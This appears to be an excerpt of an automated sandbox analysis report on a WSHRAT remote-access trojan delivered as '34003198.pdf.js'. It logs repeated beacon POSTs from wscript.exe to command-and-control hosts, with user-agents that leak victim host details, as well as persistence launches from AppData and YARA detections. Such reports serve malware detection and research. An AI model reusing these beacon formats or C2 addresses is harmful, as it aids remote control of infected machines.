                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:25.746752977 CEST302OUTPOST /Vre HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: jemyy.theworkpc.com:5401
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.44974694.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:26.640970945 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.44974794.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:26.802190065 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.449748109.248.151.10654016540C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:26.838700056 CEST302OUTPOST /Vre HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: jemyy.theworkpc.com:5401
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.44974994.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:32.402481079 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.44975094.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:32.505544901 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.44975194.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:38.781042099 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.44975294.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:38.924678087 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.44975494.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:44.611332893 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.44975594.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:44.761205912 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.44975694.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:50.417543888 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.44975794.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:50.526021004 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.44975894.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:56.289406061 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.44975994.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:28:56.367337942 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.44976094.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:02.031121969 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.44976194.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:02.102083921 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.44976294.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:07.909979105 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.44976394.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:07.984956980 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.44976494.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:13.745654106 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.44976594.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:13.936451912 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.44976694.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:19.504394054 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.44976794.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:19.753385067 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.44976894.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:25.223068953 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.44976994.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:25.681174040 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.44977094.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:30.996856928 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.44977194.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:31.465526104 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.44977294.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:36.802593946 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.44977394.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:37.267220974 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.44977494.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:42.605648994 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.44977594.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:43.138962984 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.44977694.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:48.531470060 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.44977794.156.71.10816043052C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:49.028842926 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.44977894.156.71.10816043168C:\Windows\System32\wscript.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 19, 2024 15:29:54.431929111 CEST327OUTPOST /is-ready HTTP/1.1
                                                              Accept: */*
                                                              user-agent: WSHRAT|B81A4609|user-PC|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 19/4/2024|JavaScript
                                                              Accept-Language: en-ch
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              Host: 94.156.71.108:1604
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:15:27:44
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:15:27:48
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:2
                                                              Start time:15:27:49
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:3
                                                              Start time:15:27:53
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:15:27:59
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:15:28:07
                                                              Start date:19/04/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                                                              Imagebase:0x7ff648880000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
